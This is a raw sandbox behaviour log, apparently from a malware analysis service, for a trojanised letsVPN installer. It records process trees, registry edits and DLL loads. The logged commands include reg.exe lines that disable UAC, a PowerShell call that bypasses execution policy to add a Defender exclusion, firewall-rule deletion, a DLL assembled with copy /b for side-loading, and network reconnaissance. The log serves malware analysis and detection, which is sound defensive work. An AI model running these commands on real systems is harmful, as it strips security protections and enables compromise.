              Source: C:\Users\user\Desktop\letsVPN.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\letsVPN.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2547019952.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003667000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: letsVPN.exe | Virustotal: Detection: 32%
              Source: tapinstall.exe | String found in binary or memory: ng of the list. When the subcommand completes, the cursor is positioned on the newly-added filter. + Add after
              Source: tapinstall.exe | String found in binary or memory: positioned on the newly-added filter. ! Deletes the next occurrence of the specified filter. When the subcommand
              Source: unknown | Process created: C:\Users\user\Desktop\letsVPN.exe "C:\Users\user\Desktop\letsVPN.exe"
              Source: C:\Users\user\Desktop\letsVPN.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\Users\user\Desktop\letsVPN.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml
              Source: C:\Windows\System32\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\letsVPN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\letsVPN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
              Source: C:\Windows\System32\mmc.exe | Process created: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe "C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe"
              Source: unknown | Process created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
              Source: C:\Windows\System32\mmc.exe | Process created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
              Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000148" "208" "c:\program files (x86)\letsvpn\driver"
              Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000160"
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe | Process created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\ProgramData\letsvpn-latest.exe | Process created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe | Process created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
              Source: unknown | Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: unknown | Process created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: base.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: wininet.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: msvcp120.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: msvcr120.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: winmm.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: msvcr120.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: userenv.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: propsys.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: dwmapi.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: oleacc.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: ntmarta.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: version.dll
